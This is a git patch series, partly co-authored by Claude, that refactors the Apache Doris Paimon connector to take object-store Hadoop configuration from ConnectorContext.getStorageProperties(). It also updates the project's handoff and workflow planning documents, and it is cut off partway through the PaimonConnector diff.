docs(storage-refactor): refresh HANDOFF for next session + encode per-phase HANDOFF rule MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - HANDOFF.md: full rewrite for the P0 + P1-T01/T02 state (5 commits, 3 decisions D-009/DV-001/DV-002). Next step = P1-T03 with the connector call-flow recon to do, the T1 framing (DV-002), the 3-file fe-core red-line, and an explicit "read docs + review against real code before implementing" resume ritual at the top. - WORKFLOW.md: encode the user's standing rule (2026-06-17): update + commit HANDOFF after each phase/task (not just session end); each phase starts by reading the docs and reviewing the next step against the real current code before coding (§2 起步 + §7). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore-storage-refactor/HANDOFF.md | 88 ++++++++++++------- .../metastore-storage-refactor/WORKFLOW.md | 4 +- 2 files changed, 57 insertions(+), 35 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 59be3c5eff6f68..45c05fa7db6046 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -1,42 +1,62 @@ -# HANDOFF — Session 间接力(每次 session 结束覆盖) +# HANDOFF — Session 间接力(每完成一个阶段/任务即更新并 commit) -> 下次 agent 接手:先读 `PROGRESS.md` → 本文件 → `WORKFLOW.md` → (如指定 task)`tasks.md` 对应块 → 一句话复述确认 → 用户确认后开始。 +> **下次 agent 接手流程(强制,用户 2026-06-17 立规)**: +> 1. 先读 `PROGRESS.md` → 本文件 → `WORKFLOW.md` → 下一 task 在 `tasks.md` 的对应块 → `decisions-log.md`/`deviations-log.md` 相关条。 +> 2. **对照真实代码 review 下一步方案**(不照搬本文件里的旧计划——代码可能已变;先 grep/读真实调用流,确认方案仍成立)。 +> 3. 一句话复述确认 + 必要时 AskUserQuestion 定边界 → 开始实施(严格按 `WORKFLOW.md §2` 单任务 TDD 循环)。 --- -**更新时间**:2026-06-17(设计补充 session:D-006/7/8) -**更新人**:Claude(3 设计点定稿 session) +**更新时间**:2026-06-17(实现 session:P0 全部 + P1-T01/T02) +**更新人**:Claude(Opus 4.8) ## 这次 session 完成了什么 -1. 用户提的 **3 个设计讨论点**经 3-agent recon + 直读复核后定稿,记为 **D-006 / D-007 / D-008**: - - **D-006**:MetaStore 后端用 `MetaStoreProvider.supports()` 自识别 + ServiceLoader(镜像 `FileSystemProvider`),`fe-connector-metastore-api` **不放** `MetaStoreType` 枚举;标识用 `String providerName()` + 能力方法。 - - **D-007**:Kerberos 抽**顶层中立叶子 `fe-kerberos`**(**否决** `fe-connector-auth`——会破 `fe-filesystem↛fe-connector` gate + fe-common 层级倒挂)。**P3a(paimon-local)纳入本次**、**P3b(全量去重)= follow-up 范围外**(均用户 2026-06-17 确认);模块名定 **`fe-kerberos`**。 - - **D-008**:vended creds 边界=连接器只「抽取」(paimon 已落地 `extractVendedToken`)、fe-core 单点「归一」(`vendStorageCredentials`)——**现状已符合**,无新增 task。 -2. 同步更新:设计文档(§0 表 + 依赖图 + §2.3 + §3.1 + §3.2 + §3.3 + 新增 §3.5)、decisions-log(D-006/7/8)、tasks(P2-T01/T02 改写 + 新增 P3a/P3b)、PROGRESS。 +1. **进入 Implement**,用户批准范围 = **P0 + P1(storage 收口),做到 P1-T06 gate 停**。 +2. **完成 P0(2/2)+ P1-T01/T02**,共 **5 个 commit**(均 TDD + checkstyle 0 + 红线核对): + - `5bf6cee` **P0-T01**:4-agent recon 三套 StorageProperties + 连接器 seam → 结论 + 定向。 + - `0f50a13` **P0-T02**:`FileSystemPluginManager.bindAll(rawMap)`(raw map → List,全量收集 supporting providers、skip 未迁移 bind 的 legacy)。TDD 5/5。 + - `ffd5466` **P1-T01**:`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi → fe-filesystem-api` pom 边。TDD 1/1,import-gate PASS。 + - `5520975` **P1-T02**:`DefaultConnectorContext.getStorageProperties()`(`getOrigProps()` 取 raw map → factory)+ `FileSystemFactory.bindAllStorageProperties()`(取 live plugin manager)。TDD 4/4 + 回归 2/2。 + - `4d190a7` **DV-002 决策记录**(T1 框架)。 +3. **3 个决策定稿**(均用户拍板): + - **D-009**:bind-all 机制 A = fe-core `FileSystemPluginManager.bindAll` + `DefaultConnectorContext.getStorageProperties()` 经 `getOrigProps()`;二次确认 **3 个 fe-core 文件**(+`FileSystemFactory` static accessor 取 live manager,因对象存储 provider 是运行时目录插件)。 + - **DV-001**:P0-1「fe-filesystem-api 已够、唯一 fe-core 改动」预期被证伪(缺 bind-all 入口)。 + - **DV-002**:T1「全等」放宽为 **常见静态凭据路径全等 + 文档记超集**(fe-filesystem 是 fe-property 路的超集:S3 role/anon、OSS/COS/OBS endpoint 无条件、BE map 多 AWS_BUCKET/ROOT_PATH/CREDENTIALS_PROVIDER_TYPE)。 +4. 同步回写:设计 §4 P0-1/P0-2 + §2.1 + §5 T1、WORKFLOW §4.1 白名单(+2 fe-core 文件)+ §5.2 T1、decisions D-009、deviations DV-001/DV-002、risks R-004(3 处)/R-001、tasks、PROGRESS。 ## 当前状态 -- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧 进行中**。 -- **范围已获批(2026-06-17 用户确认)= P0 + P1(storage 收口),做到 P1-T06 gate 停**。 -- **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 -- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`)| **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空 + 边)| **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 fe-core 文件全 additive,TDD 4 绿 + 2 回归绿)。 -- **fe-core/spi 侧管线已通**:getOrigProps→bindAll(live manager)→ConnectorContext.getStorageProperties()。 -- **下一个:P1-T03**(连接器侧首个 task)。T1 框架已定 **A(DV-002)**:认 fe-filesystem 新事实源,T1 = 常见静态凭据路径全等 + 文档记超集。实现要点: - 1. paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopProperties().toHadoopConfigurationMap()`(取代 `fe-property StorageProperties.buildObjectStorageHadoopConfig`),**保留**其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 - 2. **先 recon**:`PaimonCatalogFactory` 是纯静态 util(无 ctx),`applyStorageConfig` 3 调用方(buildHadoopConfiguration/buildHmsHiveConf/buildDlfHiveConf);须找到连接器调 factory 处 ctx/storageList 从哪来,把 `List` 线程进去(签名重构)。 - 3. T1 等价性测试:fe-filesystem 产物 vs fe-property 现产物,常见路径全等 + 注释超集(R-001 闸)。 - 4. 编译/测 paimon 模块需 `-am package -Dassembly.skipAssembly=true`(shade jar 带 HiveConf)。 -- 代码 commit:P0-T01(plan-doc)+ P0-T02 + P1-T01 + P1-T02 + DV-002 决策记录。 - -## 下一步(明确) -1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 -2. 获批后从 **P1-T01**(`ConnectorContext.getStorageProperties()`)开始;`P0-T01/T02` 可并行。Kerberos `fe-kerberos`(P3a-T01)依赖 P2-T02。 -3. 严格按 `WORKFLOW.md §2` 单任务循环。 - -## 未决 / 需用户确认 -- ~~P3a 是否纳入本次~~ → **已确认纳入**(2026-06-17)。~~模块名~~ → **定 `fe-kerberos`**。 -- `P1-T02` 是本项目**唯一**的 fe-core 改动(`DefaultConnectorContext` 新增 `getStorageProperties()`,限 paimon 路径、不碰 property 包)。用户已倾向接受。 -- ⚠️ **红线扩展**:P3a 新增 `fe-kerberos` 顶层模块属本次合法改动;但 fe-common / fe-filesystem-hdfs 的既有 kerberos 路径**本次零改动**(P3b follow-up)——提交前 `git diff` 须确认未碰这两处。 - -## 红线提醒(WORKFLOW §4) -- 只动:metastore-api/spi(新建)、paimon、ConnectorContext(仅新增)、DefaultConnectorContext(仅新增)、相关 pom、本跟踪目录。 -- 禁碰:fe-core `datasource.property.{storage,metastore}` 包、其它连接器、fe-property 删除。 +- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 2/6)**。 +- 任务计数 **4/14**(P0: 2/2 ✅ | P1: 2/6 | P2: 0/5 | P3a: 0/1)。 +- **fe-core/spi 侧管线已通且全绿**:`CatalogProperty.getProperties()`(raw) →(`DefaultConnectorContext.getStorageProperties()` 内)任一 typed 值 `getOrigProps()` → `FileSystemFactory.bindAllStorageProperties()` → live `FileSystemPluginManager.bindAll()` → `List` → `ConnectorContext.getStorageProperties()`(连接器待 P1-T03 消费)。 +- fe-core 改动 = **3 文件全 additive**:`DefaultConnectorContext`(+getStorageProperties)、`fs/FileSystemPluginManager`(+bindAll)、`fs/FileSystemFactory`(+bindAllStorageProperties)。 +- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + 单测)。 + +## 下一步(明确):P1-T03(连接器侧首个 task) +> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但 paimon 连接器调用流须现场核实。 + +**目标**:paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopProperties().toHadoopConfigurationMap()`,取代 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)`;**保留**其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins,有历史 bug 注释为证)。 + +**先做 recon(关键未知)**: +- `PaimonCatalogFactory` 是**纯静态 util**(无 ctx 字段,只吃 raw `Map props`);`applyStorageConfig(props, setter)` 现调静态 fe-property 方法。3 调用方:`buildHadoopConfiguration`(:367)、`buildHmsHiveConf`(:478)、`buildDlfHiveConf`(:589)。 +- **须查清**:连接器在哪里调这些 `PaimonCatalogFactory.buildXxx`?那里 `ConnectorContext`(→`getStorageProperties()`)/`List` 能否拿到?→ 把 storage list 线程进 `applyStorageConfig`(签名重构),或在调用点先算好 hadoop map 传入。grep `PaimonCatalogFactory.` 找调用方(大概率在 `PaimonConnector`/catalog 创建路径,且在 `ctx.executeAuthenticated` 内)。 +- 注意 fe-property 现路是 object-store-only(HDFS 不贡献,靠 overlay 的 raw passthrough);fe-filesystem 同理(bindAll skip HDFS)。两边对齐。 + +**T1 等价性测试(R-001 闸,DV-002 框架)**:fe-filesystem `toHadoopConfigurationMap()` 产物 vs fe-property `buildObjectStorageHadoopConfig` 现产物,在**常见静态凭据路径**(S3/OSS/COS/OBS 配齐 endpoint/region/AK/SK、无 role、无 vended)下 key/value **全等**;超集差异(S3 role/anon、endpoint 无条件、BE 多键)写注释记录,不当漂移。 + +**编译/测**:paimon 模块需 `mvn ... -am package -Dassembly.skipAssembly=true`(shade jar 携带 HiveConf);`-Dmaven.build.cache.enabled=false` 确保 surefire 真跑;后台 task 看 `BUILD SUCCESS/FAILURE` 行非 echo exit code。 + +**之后**:P1-T04(BE 凭据切 `getStorageProperties().toBackendProperties().toMap()`,用户定 A=全量切,vended 路不动)→ P1-T05(删 paimon→fe-property pom 依赖 + import;`grep org.apache.doris.property` 归零,**不删 fe-property 模块**)→ P1-T06(UT + T1 + docker 5 flavor,不跑则标「未跑 e2e」)。 + +## 未决 / 需注意 +- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009,3 fe-core 文件)|T1 框架 A(DV-002)。 +- ❓ P1-T03 唯一现场未知 = **连接器调 `PaimonCatalogFactory.buildXxx` 处 ctx/storageList 的可达性**(决定签名重构形态)——recon 后若发现需改连接器其它文件或有阻碍,停下 AskUserQuestion。 +- ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 + +## 红线提醒(WORKFLOW §4,本 session 已扩张 2 次) +- **可动**(白名单):`fe-connector-paimon/**`(P1-T03+ 改造)、`fe-connector-spi/**`(已加 getStorageProperties,勿再扩)、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法**,勿碰既有方法)、相关 pom(仅依赖增删)、本跟踪目录。 +- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、fe-filesystem 各模块、`fe-property` 模块删除。 +- 每次提交前 `git diff --name-only` 对照白名单;3 个 fe-core 文件 `git diff` 须只见新增。 + +## 关键链接 +- 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) +- 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) | 偏差:[`deviations-log.md`](./deviations-log.md) | 风险:[`risks.md`](./risks.md) diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index 911ed82e7e6c39..b7f342e0fc331b 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -21,6 +21,8 @@ ## 2. 单任务开发循环(step-by-step-fix + TDD) +**起步(每个 session / 阶段开始,用户 2026-06-17 立规,强制)**:先读 `PROGRESS.md` → `HANDOFF.md` → 本文件 → 下一 task 的 `tasks.md` 块 + 相关 `decisions-log`/`deviations-log` 条;**再对照真实代码 review 下一步方案**(不照搬 HANDOFF 旧计划——先 grep/读真实调用流确认方案仍成立);一句话复述确认(必要时 AskUserQuestion 定边界)后才动手。 + 每个 `Pn-Tnn` 严格走以下 8 步,**一个 task = 一个独立 commit**: 1. **认领**:在 `tasks.md` 把该 task 状态 `⬜→🚧`,在 `HANDOFF.md` 记"正在做 Pn-Tnn"。 @@ -113,7 +115,7 @@ plan-doc/metastore-storage-refactor/** (本跟踪目录) | 完成一个 task | `tasks.md` 状态翻转 + 日期/commit;更新 `PROGRESS.md`;阶段日志追加一行 | | 产生新决策 | 先写 `decisions-log.md` 顶部分配 D-NNN;如改设计则回写并加脚注 | | 发现偏差 | 先写 `deviations-log.md`(DV-NNN:原计划位置/为何不可行/新方案/影响);再改设计 | -| 每次 session 结束 | 覆盖更新 `HANDOFF.md`(完成了什么 / 下一步 / 未决) | +| **每完成一个 task/阶段 或 session 结束**(用户 2026-06-17 立规) | **覆盖更新 `HANDOFF.md`**(完成了什么 / 下一步含真实代码 review 要点 / 未决 / 红线)**并 commit**(随该 task commit 或单独 doc commit)。下次接手不靠记忆、只靠 HANDOFF。 | | 每个 commit | 第一行 `[Pn-Tnn] `;merge 后立即按上面流程更新状态 | --- From f77e1df1bd495cac0eeadc0b431e9f5c5a882217 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 19:45:46 +0800 Subject: [PATCH 081/128] [P1-T03] fe-connector-paimon: storage config via ctx.getStorageProperties() (fe-filesystem-api) PaimonCatalogFactory.applyStorageConfig now overlays a pre-computed storageHadoopConfig map instead of calling fe-property StorageProperties.buildObjectStorageHadoopConfig(props). The connector-local overlay (paimon.* re-key + raw fs./dfs./hadoop. passthrough, last-write-wins) and the kerberos-after-storage ordering in buildHmsHiveConf are preserved. PaimonConnector.buildStorageHadoopConfig() assembles the map from ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap(); REST ignores it. fe-property import removed (pom dep kept for P1-T05, DV-003-b); fe-filesystem-api added as a direct dependency. HMS 1/2/3-arg overloads collapsed to a single explicit 3-arg builder. Tests: ~23 canonical-translation UTs removed (now fe-filesystem's job, covered by its *FileSystemPropertiesTest); 6 connector-contract UTs added (storage-map overlay x3 builders + explicit-fs.s3a-overrides-storage + paimon-prefix-overrides-storage + kerberos-survives-storage-overlay). paimon module 292/0/0 (1 docker-gated skip), checkstyle 0, connector import-gate PASS. T1 equivalence = Option C (DV-003): connector-local contract UT + docker P1-T06 gate, because fe-filesystem object-store impls are runtime-only plugins absent from every unit-test classpath. Adversarial review wf_76df09a4-c2f (8 agents) refuted a false BLOCKER + 2 MAJORs and confirmed R-006: the S3/OSS/COS/OBS tuning defaults (50/3000/1000, 100/10000/10000) lack an explicit UT guard in fe-filesystem (functionally correct, docker-backstopped; fe-filesystem test follow-up is out of the P1 whitelist). e2e/docker NOT run. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 10 + .../paimon/PaimonCatalogFactory.java | 125 ++-- .../connector/paimon/PaimonConnector.java | 34 +- .../paimon/PaimonCatalogFactoryTest.java | 671 +++++------------- .../metastore-storage-refactor/HANDOFF.md | 62 +- .../metastore-storage-refactor/PROGRESS.md | 13 +- .../deviations-log.md | 10 + plan-doc/metastore-storage-refactor/risks.md | 10 +- plan-doc/metastore-storage-refactor/tasks.md | 8 +- 9 files changed, 331 insertions(+), 612 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index c4b18766d7a386..72649f0b5a5862 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -54,6 +54,16 @@ under the License. ${project.version} + + + ${project.groupId} + fe-filesystem-api + ${project.version} + + diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 796e0e9262be14..2c7e6d43202120 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -17,8 +17,6 @@ package org.apache.doris.connector.paimon; -import org.apache.doris.property.storage.StorageProperties; - import org.apache.commons.lang3.BooleanUtils; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; @@ -48,11 +46,14 @@ * *

      B1 also adds three PURE Hadoop config builders ({@link #buildHadoopConfiguration}, * {@link #buildHmsHiveConf}, {@link #buildDlfHiveConf}) that reconstruct, from the raw property - * map alone, the {@code Configuration}/{@code HiveConf} that the live HiveCatalog needs. These - * replace the fe-core {@code StorageProperties.getHadoopStorageConfig()} / - * {@code HMSBaseProperties.getHiveConf()} / {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} - * with a minimal, fe-core-free reconstruction. They are still pure (Map in, conf out) so they are - * unit-testable offline; only the {@code CatalogFactory.createCatalog} call in + * map plus a pre-computed canonical object-store storage config, the {@code Configuration}/ + * {@code HiveConf} that the live HiveCatalog needs. These replace the fe-core + * {@code StorageProperties.getHadoopStorageConfig()} / {@code HMSBaseProperties.getHiveConf()} / + * {@code PaimonAliyunDLFMetaStoreProperties.buildHiveConf()} with a minimal, fe-core-free + * reconstruction. The {@code storageHadoopConfig} arg is assembled by {@code PaimonConnector} from + * {@code ConnectorContext.getStorageProperties()} (fe-filesystem's + * {@code toHadoopProperties().toHadoopConfigurationMap()}), so the builders stay pure (Maps in, conf + * out) and unit-testable offline; only the {@code CatalogFactory.createCatalog} call in * {@code PaimonConnector} needs a live metastore. */ public final class PaimonCatalogFactory { @@ -336,26 +337,29 @@ private static void appendDlfOptions(Options options) { // --------------------------------------------------------------------- /** - * Builds a minimal Hadoop {@link Configuration} for the storage layer (HDFS / S3 / OSS), - * reconstructed from the raw property map. This replaces the fe-core - * {@code StorageProperties.getHadoopStorageConfig()} + {@code AbstractPaimonProperties - * .normalizeS3Config()/appendUserHadoopConfig()} with a fe-core-free port: + * Builds a minimal Hadoop {@link Configuration} for the storage layer (HDFS / S3 / OSS), from the + * raw property map plus the pre-computed object-store storage config: * *

        - *
      • canonical {@code s3.*}/{@code AWS_*} and {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} - * aliases are translated to {@code fs.s3a.*} / Jindo {@code fs.oss.*} (ported legacy - * {@code appendS3HdfsProperties} + {@code OSSProperties.initializeHadoopStorageConfig}; - * see {@link #applyStorageConfig});
      • + *
      • {@code storageHadoopConfig} carries the canonical object-store translation + * ({@code s3.*}/{@code oss.*}/{@code cos.*}/{@code obs.*}/{@code AWS_*} -> {@code fs.s3a.*} / + * Jindo {@code fs.oss.*} / etc.), computed upstream by the connector from + * {@code ConnectorContext.getStorageProperties()} via fe-filesystem's + * {@code toHadoopProperties().toHadoopConfigurationMap()} (P1-T03; replaces the fe-property + * {@code StorageProperties.buildObjectStorageHadoopConfig(props)} call);
      • *
      • {@code paimon.s3.*} / {@code paimon.s3a.*} / {@code paimon.fs.s3.*} / {@code paimon.fs.oss.*} * are normalized to the Hadoop S3A prefix {@code fs.s3a.} (strip the matched prefix, * re-key as {@code fs.s3a.} + remainder), matching legacy {@code normalizeS3Config};
      • *
      • raw {@code fs.*} / {@code dfs.*} / {@code hadoop.*} keys are copied verbatim (these are - * already Hadoop-recognized keys the user passed through).
      • + * already Hadoop-recognized keys the user passed through). HDFS contributes via this + * passthrough only — it is absent from {@code storageHadoopConfig} (fe-filesystem binds + * object stores only), matching legacy. *
      * - *

      PURE: depends only on {@code props}. + *

      PURE: depends only on {@code props} and {@code storageHadoopConfig}. */ - public static Configuration buildHadoopConfiguration(Map props) { + public static Configuration buildHadoopConfiguration(Map props, + Map storageHadoopConfig) { Configuration conf = new Configuration(); // Pin the Configuration's classloader to the plugin loader (FIX-PAIMON-HADOOP-CLASSLOADER). // Hadoop resolves filesystem impls via Configuration.getClass("fs..impl", ...), which @@ -364,34 +368,35 @@ public static Configuration buildHadoopConfiguration(Map props) // S3AFileSystem from the parent and fail the cast to the child-loaded FileSystem. Resolving // through the plugin loader keeps the whole FS class graph in one loader. conf.setClassLoader(PaimonCatalogFactory.class.getClassLoader()); - applyStorageConfig(props, conf::set); + applyStorageConfig(storageHadoopConfig, props, conf::set); return conf; } /** - * Applies the normalized storage config via the given setter. Shared by - * {@link #buildHadoopConfiguration} and the HiveConf builders (which overlay the same storage - * config onto the HiveConf, mirroring legacy {@code appendUserHadoopConfig(hiveConf)} + - * {@code ossProps.getHadoopStorageConfig()}). Three steps, in legacy precedence order: + * Applies the storage config via the given setter. Shared by {@link #buildHadoopConfiguration} and + * the HiveConf builders (which overlay the same storage config onto the HiveConf, mirroring legacy + * {@code appendUserHadoopConfig(hiveConf)} + {@code ossProps.getHadoopStorageConfig()}). Two steps, + * in legacy precedence order: * *

        - *
      1. canonical {@code s3.*}/{@code AWS_*} aliases -> {@code fs.s3a.*} (ported legacy - * {@code AbstractS3CompatibleProperties.appendS3HdfsProperties}, credential subset);
      2. - *
      3. canonical {@code oss.*}/{@code fs.oss.*}/{@code dlf.*} aliases -> Jindo {@code fs.oss.*} - * (ported legacy {@code OSSProperties.initializeHadoopStorageConfig});
      4. + *
      5. the pre-computed {@code storageHadoopConfig} (canonical object-store translation, produced + * upstream from {@code ConnectorContext.getStorageProperties()} via fe-filesystem's + * {@code toHadoopConfigurationMap()}; replaces the fe-property + * {@code StorageProperties.buildObjectStorageHadoopConfig(props)} call);
      6. *
      7. the original {@code paimon.s3./s3a./fs.s3./fs.oss.} re-key + raw {@code fs./dfs./hadoop.} * passthrough, which run LAST and overlay the canonical translation (last-write-wins = * legacy {@code addResource(getHadoopStorageConfig())} then {@code appendUserHadoopConfig}).
      8. *
      */ - private static void applyStorageConfig(Map props, BiConsumer setter) { - // Canonical object-store alias -> fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.* translation, delegated to the shared - // fe-property module (replaces the hand-ported applyCanonicalS3/Minio/Oss/Cos/Obs blocks that diverged and - // caused the MinIO bug). It detects each object-store family from the raw props and emits the same Hadoop - // keys legacy did; HDFS contributes nothing here (handled by the raw passthrough below), matching legacy - // (applyStorageConfig never had an HDFS canonical block). - StorageProperties.buildObjectStorageHadoopConfig(props).forEach(setter); - // Connector-specific (NOT in fe-property): paimon.* prefix re-key + raw fs./dfs./hadoop. passthrough, + private static void applyStorageConfig(Map storageHadoopConfig, + Map props, BiConsumer setter) { + // Pre-computed canonical object-store config (fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.*), assembled by + // PaimonConnector from ctx.getStorageProperties().toHadoopProperties().toHadoopConfigurationMap() + // (fe-filesystem is now the single source of truth; P1-T03). HDFS is absent here (fe-filesystem + // binds object stores only) and reaches the conf via the raw fs./dfs./hadoop. passthrough below, + // matching legacy (applyStorageConfig never had an HDFS canonical block). + storageHadoopConfig.forEach(setter); + // Connector-specific (NOT in fe-filesystem): paimon.* prefix re-key + raw fs./dfs./hadoop. passthrough, // run LAST so explicit fs.s3a.* keys overlay the canonical translation (last-write-wins). props.forEach((key, value) -> { for (String prefix : USER_STORAGE_PREFIXES) { @@ -408,10 +413,21 @@ private static void applyStorageConfig(Map props, BiConsumer{@code hiveConfResources} = the pre-resolved key/values of an external + * {@code hive.conf.resources} hive-site.xml, loaded FE-side via + * {@code ConnectorContext.loadHiveConfResources} (legacy {@code CatalogConfigFileUtils}, which the + * connector cannot import). It is the {@code HiveConf} BASE, applied BEFORE the user {@code hive.*} + * overrides — matching legacy {@code HMSBaseProperties.checkAndInit} precedence (file is base, user + * {@code hive.*} and the resolved uri win). + * + *

      {@code storageHadoopConfig} = the pre-computed canonical object-store config (from + * {@code ConnectorContext.getStorageProperties()} via fe-filesystem's + * {@code toHadoopConfigurationMap()}; P1-T03), overlaid via {@link #applyStorageConfig}. * *

      NOTE (B1, post-fix I-2): the kerberos-conditional metastore keys legacy * {@code HMSBaseProperties.initHadoopAuthenticator}/{@code checkAndInit} sets ARE now handled @@ -419,27 +435,14 @@ private static void applyStorageConfig(Map props, BiConsumerPURE: depends only on {@code props} (and the pre-resolved file keys in the overload). - */ - public static HiveConf buildHmsHiveConf(Map props) { - return buildHmsHiveConf(props, java.util.Collections.emptyMap()); - } - - /** - * As {@link #buildHmsHiveConf(Map)}, but seeds {@code hiveConfResources} (the pre-resolved - * key/values of an external {@code hive.conf.resources} hive-site.xml, loaded FE-side via - * {@code ConnectorContext.loadHiveConfResources}) as the {@code HiveConf} BASE, BEFORE the user - * {@code hive.*} overrides — matching legacy {@code HMSBaseProperties.checkAndInit} precedence - * (file is base, user {@code hive.*} and the resolved uri win). PURE: depends only on the two maps. + *

      PURE: depends only on the three maps. */ - public static HiveConf buildHmsHiveConf(Map props, Map hiveConfResources) { + public static HiveConf buildHmsHiveConf(Map props, Map hiveConfResources, + Map storageHadoopConfig) { HiveConf hiveConf = new HiveConf(); // External hive-site.xml (hive.conf.resources) as the BASE (legacy checkAndInit loads the // file first); the user hive.* keys below then correctly OVERRIDE it. @@ -475,7 +478,7 @@ public static HiveConf buildHmsHiveConf(Map props, Map props, Map * - *

      PURE: depends only on {@code props}. + *

      PURE: depends only on {@code props} and {@code storageHadoopConfig} (the pre-computed + * canonical OSS config from {@code ConnectorContext.getStorageProperties()}; P1-T03). */ - public static HiveConf buildDlfHiveConf(Map props) { + public static HiveConf buildDlfHiveConf(Map props, + Map storageHadoopConfig) { String accessKey = firstNonBlank(props, PaimonConnectorProperties.DLF_ACCESS_KEY); String secretKey = firstNonBlank(props, PaimonConnectorProperties.DLF_SECRET_KEY); String sessionToken = firstNonBlank(props, PaimonConnectorProperties.DLF_SESSION_TOKEN); @@ -586,7 +591,7 @@ public static HiveConf buildDlfHiveConf(Map props) { // The OSS endpoint-from-region derivation now lives in the shared fe-property OSSProperties (used by the // filesystem/hms flavors too, with the same dlf.access.public source), so no DLF-local OSS derivation is // needed here. - applyStorageConfig(props, hiveConf::set); + applyStorageConfig(storageHadoopConfig, props, hiveConf::set); return hiveConf; } diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 9ae55b0e06fc21..1d7c1f438a43b8 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -24,6 +24,7 @@ import org.apache.doris.connector.api.ConnectorValidationContext; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.filesystem.properties.StorageProperties; import org.apache.commons.lang3.StringUtils; import org.apache.hadoop.conf.Configuration; @@ -41,6 +42,7 @@ import java.net.URLClassLoader; import java.util.Collections; import java.util.EnumSet; +import java.util.HashMap; import java.util.Map; import java.util.Set; import java.util.concurrent.ConcurrentHashMap; @@ -126,11 +128,15 @@ private Catalog ensureCatalog() { private Catalog createCatalog() { Options options = PaimonCatalogFactory.buildCatalogOptions(properties); String flavor = PaimonCatalogFactory.resolveFlavor(properties); + // Canonical object-store storage config from the FE-bound fe-filesystem StorageProperties + // (P1-T03), replacing the legacy fe-property buildObjectStorageHadoopConfig path. Empty for + // REST (server owns storage) and HDFS-only catalogs (carried by the raw passthrough instead). + Map storageHadoopConfig = buildStorageHadoopConfig(); switch (flavor) { case PaimonConnectorProperties.FILESYSTEM: { // filesystem carries a Hadoop Configuration for HDFS/S3 storage. - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(properties); + Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(properties, storageHadoopConfig); return createCatalogFromContext(CatalogContext.create(options, conf), flavor, "Failed to create Paimon catalog with filesystem metastore"); } @@ -141,7 +147,7 @@ private Catalog createCatalog() { } case PaimonConnectorProperties.JDBC: { maybeRegisterJdbcDriver(); - Configuration conf = 